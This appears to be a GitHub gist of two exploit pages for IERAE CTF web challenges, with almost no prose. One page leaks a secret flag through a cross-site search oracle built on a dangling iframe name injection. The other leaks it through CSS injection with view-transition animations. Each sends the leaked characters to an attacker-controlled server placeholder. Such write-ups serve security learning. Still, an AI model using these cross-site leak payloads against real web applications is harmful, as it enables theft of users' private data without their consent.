Created
September 22, 2024 06:12
-
-
Save satoooon8888/2d166541f044e633dd04f2202f55cefe to your computer and use it in GitHub Desktop.
IERAE CTF web challenges
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<title>Exploit</title> | |
</head> | |
<body> | |
<script type="text/javascript"> | |
const EXP_HOST = 'http://YOUR_SERVER'; | |
const WEB_HOST = 'http://web:3000'; | |
const CHARS = `abcdefghijklmnopqrstuvwxyz}`; | |
const sleep = async (msec) => new Promise((resolve) => setTimeout(resolve, msec)); | |
const log = async (path) => { | |
debugger; | |
await fetch(`${EXP_HOST}${path}`); | |
} | |
const submitForm = (method, action, params, target="_blank") => { | |
const form = document.createElement("form"); | |
form.method = method; | |
form.action = action; | |
form.target = target; | |
Object.entries(params).forEach(([k, v]) => { | |
const input = document.createElement("input"); | |
input.type = "text"; | |
input.name = k; | |
input.value = v; | |
form.appendChild(input); | |
}); | |
document.body.appendChild(form); | |
form.submit(); | |
} | |
const HIT_NAME=`</li>\n<li><span class=`; | |
const oracle = async (s) => { | |
w = open(`${WEB_HOST}/?query=${s}`); | |
await sleep(300); | |
try{ | |
if (typeof w[HIT_NAME]) { | |
w.close(); | |
return true; | |
} | |
} catch (e) { | |
console.log(e) | |
} | |
w.close(); | |
return false; | |
} | |
const leak = async (prefix) => { | |
for (let c of CHARS) { | |
const payload = prefix + c; | |
const result = await oracle(payload); | |
if (result) return payload; | |
} | |
throw Error("nope"); | |
} | |
const exploit = async () => { | |
submitForm("POST", `${WEB_HOST}/create`, { | |
note: '<iframe name="' | |
}) | |
await sleep(1000); | |
let prefix = "IERAE{" | |
while (1) { | |
prefix = await leak(prefix) | |
log(`/log?${prefix}`); | |
} | |
}; | |
(async () => { | |
try { | |
console.log("Start exploit"); | |
await exploit(); | |
console.log("Finished exploit"); | |
} catch (e) { | |
console.log(e); | |
} | |
})(); | |
</script> | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<title>Exploit</title> | |
</head> | |
<body> | |
<script type="text/javascript"> | |
const EXP_HOST = 'http://YOUR_SERVER'; | |
const WEB_HOST = 'http://web:3000'; | |
const CHARS = `abcdefghijklmnopqrstuvwxyz`; | |
const sleep = async (msec) => new Promise((resolve) => setTimeout(resolve, msec)); | |
const log = async (path) => { | |
await fetch(`${EXP_HOST}${path}`); | |
} | |
const submitForm = (method, action, params, target="_blank") => { | |
const form = document.createElement("form"); | |
form.method = method; | |
form.action = action; | |
form.target = target; | |
Object.entries(params).forEach(([k, v]) => { | |
const input = document.createElement("input"); | |
input.type = "text"; | |
input.name = k; | |
input.value = v; | |
form.appendChild(input); | |
}); | |
document.body.appendChild(form); | |
form.submit(); | |
} | |
const leak = async (prefix) => { | |
for (let c of CHARS) { | |
const w = open(`${WEB_HOST}/?search=${prefix+c}`, prefix+c); | |
await sleep(300); | |
w.focus(); | |
// if the prefix is hit, the flag doesn't start with the prefix | |
submitForm("POST", `${WEB_HOST}/create`, { | |
title: `note-${prefix+c}`, | |
body: prefix+c, | |
style: ` | |
@keyframes anim { | |
0% { | |
background-image: url(${EXP_HOST}/hit?leak=${prefix}/${c}); | |
} | |
} | |
::view-transition-old(site-title) { | |
animation: 0.01s linear both anim; | |
} | |
::view-transition-new(site-title) { | |
animation: 0.01s linear both anim; | |
} | |
` | |
}, prefix+c) | |
await sleep(300); | |
w.close(); | |
} | |
} | |
const exploit = async () => { | |
let prefix = "IERAE{" | |
while (1) { | |
await leak(prefix) | |
await sleep(300); | |
await fetch("/prefix").then(r=>r.text()).then(r=>{ | |
prefix = r; | |
}); | |
} | |
}; | |
(async () => { | |
try { | |
console.log("Start exploit"); | |
await exploit(); | |
console.log("Finished exploit"); | |
} catch (e) { | |
console.log(e); | |
} | |
})(); | |
</script> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment